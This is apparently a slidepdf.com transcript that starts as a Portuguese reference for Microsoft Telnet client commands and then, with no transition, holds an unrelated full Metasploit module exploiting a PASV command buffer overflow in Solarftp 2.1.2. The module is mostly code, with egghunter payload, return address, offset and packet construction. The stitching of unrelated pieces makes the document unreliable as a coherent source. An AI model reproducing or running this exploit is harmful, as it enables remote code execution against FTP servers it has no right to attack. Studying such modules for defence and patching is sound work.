Comandos Telnet
-
Upload
jose-silva -
Category
Documents
-
view
126 -
download
0
Transcript of Comandos Telnet
5/12/2018 Comandos Telnet - slidepdf.com
http://slidepdf.com/reader/full/comandos-telnet 1/5
Comandos Telnet
Comandos Telnet
Os comandos Telnet permitem a comunicação com um computador remoto que esteja usando oprotocolo Telnet. É possível executar o Telnet sem parâmetros para inserir o contexto do Telnet,indicado pelo prompt do Telnet (Microsoft Telnet>). No prompt Telnet, use os comandos Telnetpara gerenciar um computador que esteja executando o cliente Telnet.
O prompt de comando do cliente Telnet aceita os seguintes comandos:
Comando Descrição
open Use opennome_do_ host para estabelecer uma conexão Telnet com um host.
close Use o comando close para fechar uma conexão Telnet existente.
display Use o comando display para exibir as configurações atuais do cliente Telnet.
send Use o comando send para enviar comandos ao servidor Telnet. Há suporte para osseguintes comandos:aoComando Abort output.aytComando "Are you there?".escEnvia o caractere de escape atual.ipComando Interrupt process.synchExecuta a operação de sincronização do Telnet.brkEnvia um sinal de interrupção.Quaisquer outros comandos diferentes desses listados anteriormente serão enviados como
uma se qüência para o servidor Telnet. Por exemplo, sendabcd enviará a seqüência abcdpara o servidor Telnet, que emitirá um eco da seqüência na janela da sessão Telnet.
quit Use o comando quit para fechar o cliente Telnet.
set Use o comando set com um dos seguintes argumentos para configurar o cliente Telnetpara a sessão atual.bsasdelA tecla Backspace funcionará como Delete.codeset opçãoDisponível apenas quando o idioma é definido como japonês. Defina o conjunto de códigosatual como opção, que pode ser:
• Shift JIS
• EUC japonês
• JIS Kanji
• JIS Kanji (78)
• DEC Kanji
• NEC Kanji
O mesmo conjunto de códigos deve ser definido no computador remoto. Por padrão, ocliente Telnet usa uma fonte de varredura. Antes de acessar um computador remotousando um desses conjuntos de códigos, você deve configurar o cliente Telnet para usaruma fonte TrueType para garantir que os caracteres serão exibidos adequadamente.
crlf Novo modo de linha; faz com que a tecla RETURN envie 0x0D, 0x0A.delasbs
5/12/2018 Comandos Telnet - slidepdf.com
http://slidepdf.com/reader/full/comandos-telnet 2/5
A tecla Delete funcionará como Backspace.escapecaractere
Alterna do modo da sessão Telnet para o modo de comando Telnet. Estando no modo decomando Telnet, pressione ENTER para voltar para o modo de sessão Telnet.localechoDesativa o eco local.logfilenome
Especifica o nome do arquivo para o qual o log do Telnet é gravado para essa sessão. Sevocê não especificar o caminho do arquivo, ele será criado no diretório atual. Especificarum arquivo de log também ativa o registro em log.loggingAtiva o registro em log para essa sessão.mode {console | stream}O modo de operação.ntlmAtiva a autenticação NTLM.term {ansi | vt100 | vt52 | vtnt}O tipo de terminal que você deseja que o cliente Telnet emule.?Exibe informações de ajuda para set.
unset Use unset para desabilitar uma opção anteriormente definida usando o comando set.
status Use o comando status para determinar se o computador que está executando o clienteTelnet está conectado.
?/help Exibe informações de ajuda.
Para obter informações sobre os comandos do servidor Telnet, consulte Referência de linha de comandopara servidor Telnet.
Marcas : gostoso (x) Adicionar uma marca
# Exploit Title: Solarftp v2.1.2 PASV buffer overflow# Date: Aug 17, 2011
5/12/2018 Comandos Telnet - slidepdf.com
http://slidepdf.com/reader/full/comandos-telnet 3/5
# Author: qnix
# Software Link: http://solarftp.com/files/solarftps-setup.exe
# Version: 2.1.2
# Tested on: Windows XP Universal
# Detailed info: http://0x80.org/blog/?p=545
require 'msf/core'
class Metasploit3 < Msf::Exploit::RemoteRank = AverageRanking
include Msf::Exploit::Remote::Ftp
include Msf::Exploit::Remote::Egghunter
def initialize(info = {})super(update_info(info,
'Name' => 'Solarftp 2.1.2 PASV Command Buffer
Overflow','Description' => %q{
This module exploits a buffer overflow in the PASVcommand in Solarftp 2.1.2
You must have valid credentials to trigger thisvulnerability. Also, you
ony get one chance.
},
'Author' => 'qnix',
'License' => MSF_LICENSE,
'References' =>
[[ 'URL', 'http://0x80.org/blog/?p=545'],
],
'DefaultOptions' =>{
'WfsDelay' => 45,'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x20\x0a\x0d",'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
#1001BD23 .FFE0 JMP EAX @sfsweb.dll
[ 'Windows XP Universal', { 'Ret' =>0x1001BD23, 'Offset' => 195} ],
],
'DisclosureDate' => 'Aug 17 2011','DefaultTarget' => 0))
5/12/2018 Comandos Telnet - slidepdf.com
http://slidepdf.com/reader/full/comandos-telnet 4/5
end
def exploitconnect_login
print_status("Trying target #{target.name}")
print_status("Creating Egg Hunter")
eggoptions =
{
:checksum => true,:eggtag => "W00T"}
hunter,egg =generate_egghunter(payload.encoded,payload_badchars,eggoptions)
fix = "\x11" # To fix some left overs from uncontrolledbuffer
# to avoid access violation.
pk1 = make_nops(75)
pk1 << fix
pk1 << make_nops(20)
pk1 << hunter
pk1 << make_nops((100-fix.length-hunter.length))
pk1 << [target.ret].pack('V')
pk1 << egg
pk1 << make_nops(6631-[target.ret].length-target['Offset']-
egg.length)print_status("Sending first packet...")
send_cmd( ["PASV",pk1], false)
pk2 = make_nops(3000)
print_status("Sending second packet...")
send_cmd( ["PASV",pk2], false)
handler
disconnect
end
end